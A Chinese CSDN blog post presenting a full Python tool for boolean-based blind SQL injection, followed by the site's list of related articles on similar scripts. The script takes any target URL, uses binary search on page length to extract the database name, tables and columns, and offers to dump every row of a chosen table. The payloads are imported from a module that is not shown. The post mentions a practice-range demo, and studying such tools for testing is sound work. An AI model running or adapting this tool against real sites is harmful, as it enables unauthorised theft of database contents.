Python编写sql布尔盲注脚本

最新推荐文章于 2024-08-03 15:24:37 发布
最新推荐文章于 2024-08-03 15:24:37 发布
阅读量1.8k 收藏 9
点赞数 8
分类专栏: Python脚本
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45605352/article/details/117381180
版权

Python 布尔盲注 数据库安全 渗透测试 二分法
关键词由CSDN通过智能技术生成

经典造轮子,小白一枚,大佬勿喷

利用requests库构造payload对目标url发起请求,由于是布尔盲注,可根据页面返回长度判断正确字符,也可根据页面返回特征判断,用二分法减少判断次数,根据不同的情况payload要做一些必要的修改,将payload存入指定文件方便调用。代码还有很多地方需要优化。

import requests
import prettytable as pt
import PAYLOAD


# 二分
def dichotomy(low, high):
    mid = (low + high) // 2
    return mid


# 测试数据库长度
def db_length(url, true_length, payload):
    print("[-]开始测试数据库名长度.......")
    num = 1
    while True:
        db_length_payload = url + payload[0].format(NUM=num)
        r = requests.get(db_length_payload)
        if true_length == len(r.text):
            db_length = num
            print("[+]数据库长度:%d\n" % db_length)
            db = db_name(url, true_length, db_length, payload)  # 进行下一步,测试库名
            break
        else:
            num += 1
    return db


# 测试当前数据库名
def db_name(url, true_length, db_length, payload):
    print("[-]开始测试数据库名.......")
    db_name = ''
    for i in range(1, db_length + 1):
        low = 33
        high = 127
        while True:
            mid = dichotomy(low, high)
            db_check_payload = url + payload[1].format(NO_1=i, NUM=mid)
            if len((requests.get(db_check_payload)).text) == true_length:
                db_name += chr(mid)
                print("\r" + db_name, end="", flush=True)
                break
            # print(low, high)
            db_payload = url + payload[2].format(NO_1=i, NUM=mid)
            r = requests.get(db_payload)
            # print(len(r.text))
            if true_length != len(r.text):
                high = mid
            else:
                low = mid
    print("\n\033[31m[+]数据库名:%s\033[0m\n" % db_name)
    tb_piece(url, true_length, db_name, payload)  # 进行下一步,测试当前数据库有几张表
    return db_name


# 测试表总数
def tb_piece(url, true_length, db_name, payload):
    print("[-]开始测试%s数据库有几张表........" % db_name)
    low = 1
    high = 300
    while True:  # 猜解该数据库共有几张表
        mid = dichotomy(low, high)
        tb_check_payload = url + payload[3].format(NUM=mid)
        if len((requests.get(tb_check_payload)).text) == true_length:
            tb_piece = mid
            # print("%s数据库共%d张表"%(db_name,tb_piece))
            break
        tb_count_payload = url + payload[4].format(NUM=mid)
        r = requests.get(tb_count_payload)
        if true_length != len(r.text):
            high = mid
        else:
            low = mid
    print("[+]%s库一共有%d张表\n" % (db_name, tb_piece))
    tb_name(url, true_length, db_name, tb_piece, payload)  # 进行下一步,猜解表名


# 猜解表名
def tb_name(url, true_length, db_name, tb_piece, payload):
    print("[-]开始猜解表名.......")
    table_list = []
    for i in range(0, tb_piece):
        tb_length = 0
        tb_name = ''
        for j in range(1, 25):  # 表名长度,合理范围即可
            tb_payload = url + payload[5].format(NO_1=i, NUM=j)
            r = requests.get(tb_payload)
            if true_length == len(r.text):
                tb_length = j
                print("第%d张表名长度:%s" % (i + 1, tb_length))
                break

        for k in range(1, tb_length + 1):
            low = 33
            high = 127
            while True:
                mid = dichotomy(low, high)
                tb_check_payload = url + payload[6].format(NO_1=i, NO_2=k, NUM=mid)
                if len(requests.get(tb_check_payload).text) == true_length:
                    tb_name += chr(mid)
                    print("\r[+]:%s" % tb_name, end="", flush=True)
                    break
                tb_payload = url + payload[7].format(NO_1=i, NO_2=k, NUM=mid)
                r = requests.get(tb_payload)
                if true_length != len(r.text):
                    high = mid
                else:
                    low = mid
        print("")
        table_list.append(tb_name)
    print("\033[33m[+]%s库下的%s张表:%s\033[0m\n" % (db_name, tb_piece, table_list))
    # column_num(table_list, db_name)  # 进行下一步,猜解每张表的字段数


# 猜解指定表字段数
def column_num(url, true_length, db_name, tb_name, payload):
    # print("[-]开始猜解每%s表的字段数......." % tb_name)
    for j in range(30):  # 指定表字段数量,合理范围即可
        column_num_payload = url + payload[8].format(NUM=j, DB_NAME=db_name, TB_NAME=tb_name)
        r = requests.get(column_num_payload)
        if len(r.text) == true_length:
            column_nums = j
            print("[+]%s表\t%s个字段" % (tb_name, column_nums))
            break
    return column_nums


# 猜解指定表字段名
def column_name(url, true_length, db_name, tb_name, payload):
    print("[-]开始猜解%s表的字段名......." % tb_name)
    columns = column_num(url, true_length, db_name, tb_name, payload)
    column_name_list = []
    for i in range(columns):  # i表示每张表的字段数量
        column_name = ''
        for j in range(1, 21):  # j表示每个字段的长度
            column_name_length = url + payload[9].format(NO_1=i, NUM=j, DB_NAME=db_name, TB_NAME=tb_name)
            # print(column_name_length)
            r = requests.get(column_name_length)
            if true_length == len(r.text):
                column_length = j
                print("第%d个字段长度:%s" % (i + 1, column_length))
                break
        for k in range(1, column_length + 1):
            low = 33
            high = 127
            while True:
                mid = dichotomy(low, high)
                # print(mid)
                tb_check_payload = url + payload[10].format(NO_1=i, NO_2=k, NUM=mid, DB_NAME=db_name, TB_NAME=tb_name)
                # print(tb_check_payload)
                if len(requests.get(tb_check_payload).text) == true_length:
                    column_name += chr(mid)
                    print("\r[+]:%s" % column_name, end="", flush=True)
                    break
                # print(low, high)
                tb_payload = url + payload[11].format(NO_1=i, NO_2=k, NUM=mid, DB_NAME=db_name, TB_NAME=tb_name)
                r = requests.get(tb_payload)
                # print(tb_payload)
                if true_length != len(r.text):
                    high = mid
                else:
                    low = mid
        print("")
        column_name_list.append(column_name)
    print("\033[34m[+]:%s表中的%d个字段:%s\033[0m\n" % (tb_name, columns, column_name_list))
    return column_name_list, columns


def dump_data(url, true_length, db_name, tb_name, column_name_list, payload):
    print("\n[-]对%s表的%s字段进行暴破.......\n" % (tb_name, column_name_list))
    data_files = []
    for co_name in column_name_list:  # 字段
        for j in range(200):  # j表示有多少条数据,合理范围即可
            data_num_payload = url + payload[12].format(CO_NAME=co_name, DB_NAME=db_name, TB_NAME=tb_name, NUM=j)
            r = requests.get(data_num_payload)
            if true_length == len(r.text):
                data_num = j
                break
        print("\n[+]%s表中的%s字段有以下%s条数据:" % (tb_name, co_name, data_num))
        data_file = []
        for k in range(data_num):
            data_len = 0
            dump_data = ''
            for l in range(0, 100):  # l表示每条数据的长度,合理范围即可
                data_len_payload = url + payload[13].format(CO_NAME=co_name, DB_NAME=db_name, TB_NAME=tb_name, NO_1=k,
                                                            NUM=l)
                # print(data_len_payload)
                r = requests.get(data_len_payload)
                if true_length == len(r.text):
                    data_len = l
                    flag = 0
                    for x in range(1, data_len + 1):  # x表示每条数据的实际范围,作为mid截取的范围
                        low = 33
                        high = 127
                        while True:
                            mid = dichotomy(low, high)
                            data_check_payload = url + payload[14].format(CO_NAME=co_name, DB_NAME=db_name,
                                                                          TB_NAME=tb_name, NO_1=k, NO_2=x, NUM=mid)
                            if len(requests.get(data_check_payload).text) == true_length:
                                dump_data += chr(mid)
                                print("\r[+]:%s" % dump_data, end="", flush=True)
                                break
                            data_payload = url + payload[15].format(CO_NAME=co_name, DB_NAME=db_name, TB_NAME=tb_name,
                                                                    NO_1=k, NO_2=x, NUM=mid)
                            r = requests.get(data_payload)
                            if true_length != len(r.text):
                                high = mid
                            else:
                                low = mid
                            if low + 1 == high:
                                flag = 1
                                break
                        if flag:
                            print(" \b(存在不可显示字符)")
                            dump_data += "..."
                            break
                    print("")
                    break
            data_file.append(dump_data)
            # print(data_file)  # 输出每条数据
        data_files.append(data_file)
    return data_files


def data_show(data_files, column_name_list, column_nums):
    tb = pt.PrettyTable()
    for i in range(column_nums):
        tb.add_column(column_name_list[i], data_files[i])
    print(tb)


def main():
    url = input("[+] 请输入url: ")  # 目标url
    true_length = len(requests.get(url).text)  # 根据页面返回长度判断布尔盲注的 true & false
    payload = PAYLOAD.payload_int
    db = db_length(url, true_length, payload)  # 程序入口
    while True:
        tb = input("选择查询的表(q退出):")
        if tb == 'q':
            break
        column_name_list, columns = column_name(url, true_length, db, tb, payload)
        flag = input("是否拖库(y or n):")
        if flag == 'y':
            data_files = dump_data(url, true_length, db, tb, column_name_list, payload)
            data_show(data_files, column_name_list, columns)


if __name__ == '__main__':
    main()

靶场演示:
在这里插入图片描述

yAnd0n9
关注
专栏目录
使用python进行sql布尔盲注exp的编写
CC210231的博客
04-04 2553
前言: 前面学习并实现了简单的注入exp编写,那是根据注入的payload 匹配 网页内容得到注入数据,像这种exp只能应用于简单的注入盲注入就要复杂一些,但是原理也是差不多。 exp原理: 我们知道,对于sql布尔盲注,也就是页面只会返回两种状态,一种是注入语句正确执行返回正常页面,一种就是注入语句执行错误返回不正常页面,我们就可以通过返回页面的状态判断我们注入语句是否正确执行,在sql布尔盲注中,我们常通过逐个判断字符来得到最终的信息,源于此,我们就有如下思路了: 返回的页面不同,也就是返回.
Python之路 | 布尔盲注、延时EXP编写
IerkeU的博客
03-29 908
什么是POC、EXP、payload? 答: ​ POC: ​ 全称为‘Proof of concept’,意为概念验证,常指为一段漏洞的证明代码 ​ 理解为:发现可能存在的漏洞后,强调对漏洞是否存在进行验证 ​ EXP: ​ 全称为‘Exploit’,意为利用,指利用系统漏洞进行攻击的动作 ​ 理解为:对已存在的漏洞进行利用,强调利用已有的资源 ​ Payload: ​ 意为有效载荷,指成功exploit之后,真正在目标系统执行的代码或指令 ​ 理解为例如使用了一条恶意SQL语句,使网站出现报
布尔盲注python3范本模板
01-16
布尔盲注python3范本模板
python实现sql时间盲注
箭雨镜屋
04-26 1051
一、python代码 二、使用方法 三、测试
SQL注入-布尔盲注脚本-注释版
最新发布
dasdasdasvsdV的博客
08-03 118
【代码】SQL注入-布尔盲注脚本
python脚本实现布尔盲注
求大佬师傅带
04-28 910
相信师傅们在平常渗透测试中,偶尔会遇到布尔盲注的情况,但是手工的话太慢,上sqlmap流量又太大,特征太明显。所以用python脚本就是最优解,可以自定义user-agent等字段,注入速度等。
基于python布尔盲注爆破脚本sqli-libs第八关)
henghengzhao_的博客
10-06 1904
写这个脚本的原因是因为布尔爆破步骤的繁琐,因此写下这个半自动化脚本来提升效率,只需输入url和标志词便可开始爆破
python mysql盲注小程序
一个码农的笔记
10-07 2184
# -*- coding: gbk -*- import urllib2 import urllib sqlcomm="(SELECT SCHEMA_NAME FROM information_schema.SCHEMATA limit 1,1)" data = { "admin":"admin' and (ascii(substring(version(),1,1))=0)
布尔盲注python脚本.zip
12-28
在给定的压缩包文件"布尔盲注python脚本.zip"中,有两个文件:bool_sql_post.py和bool_sql_get.py,分别对应于使用POST和GET方法进行布尔盲注Python脚本。下面我们将详细讨论这两个知识点。 1. **布尔盲注原理**...
布尔盲注.py_sql盲注python_
10-03
在这个场景中,我们关注的是一个名为"布尔盲注.py"的Python脚本,它显然是用于演示或执行SQL盲注的工具。 在SQL盲注中,攻击者通常不能直接看到查询结果,而是必须依赖于应用程序对查询成功或失败的间接响应。例如...
SQL注入之基于布尔盲注详解
09-10
在实际操作中,由于手动进行布尔盲注非常耗时,通常会编写自动化脚本来辅助。例如,Python的`requests`库可以用来发送HTTP请求,通过检查响应的长度或内容来判断SQL查询的正确性。这样的脚本会迭代所有可能的字符...
Python】测试布尔盲注脚本
weixin_30457881的博客
11-16 349
sqli-labs第八关:单引号布尔盲注,手工测出database长度,个人觉得手工比较快 然后使用脚本测database内容,这个脚本就比手工快多了,脚本内容如下: 1 import sys 2 import requests 3 4 url="http://127.0.0.1/sqli-labs-master/Less-8/?id=1%s" 5 payload="...
Python】面向Sqli-Labs Less15的布尔盲注二分法脚本
RexHa的博客
11-18 1793
python实现sqli-labs第15关post盲注二分法注入脚本(基于布尔盲注
sql注入学习笔记(四)时间型盲注
w17691058648x的博客
03-15 558
时间型的注入遇到的条件更为苛刻,数据交互完成以后目标网站没有错误和正确的页面回显,这种情况我们可以利用时间函数来判断数据有没有在目标数据中得到执行。当然也需要构造闭合。 函数: lenght() //长度 ascii() //ASCII码 mid() //截取字符串 substr() //截取字符串 hex() //以上在布尔型中介绍过 ...
python多线程结合二分法算法|命令注入盲注
tempulcc的博客
09-28 660
实战python多线程结合二分法算法应用命令注入基于时间的盲注 本文采用threading、queue模块启用多线程,结合二分法算法思想(递归、非递归两种方法)实战natas的第16关、第17关,可大幅提升程序寻找通关密码的效率。 命令注入 URL:http://natas16.natas.labs.overthewire.org Username:natas16 Password:WaIHEacj63wnNIBROHeqi3p9t0m5nhmh 源码: <? $key = ""; if(arr
Python自动化sql注入布尔盲注
qq_46145027的博客
04-22 3855
sql注入时,使用python脚本可以大大提高注入效率,这里演示一下编写python脚本实现布尔盲注的基本流程:演示靶场:sqli-labs。
python布尔盲注脚本
kiihuang的博客
03-28 518
使用python编写一个可以自动爆破的布尔盲注脚本,根据不同情况调整里面的Content-Length的值。
SQL注入盲注(小白的学习)
lgsyydsa的博客
06-04 593
对length列从小到大或者从大到小排列,会发现有一些结果的长度与大部分的长度不同,如果还是不知道可以在下面response的render中会有图显示。所以我们可以通过修改substr中第二个参数来进行判断,但是这样会浪费大量的时间。注意:limit 0,1 表示是第一张表,如果爆出来的表不太像有flag的,可以修改limit 第一个参数,继续爆下一个表名。第一个参数由于不知道表名长度,可以设置为10,第二个参数设置同上,爆破完后将长度进行排序可知表名为flag,这很ctfhub。所以先判断数据库的长度。
SQL注入-布尔盲注
acepanhuan的博客
02-10 1733
学习SQL注入方法之盲注
python布尔盲注
05-01
Python 中,可以通过构造 SQL 语句,来实现布尔盲注。 以下是一个简单的 Python 布尔盲注脚本的示例: ```python import requests url = "http://example.com/login.php" # 替换成具体的目标网站 URL payload...
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值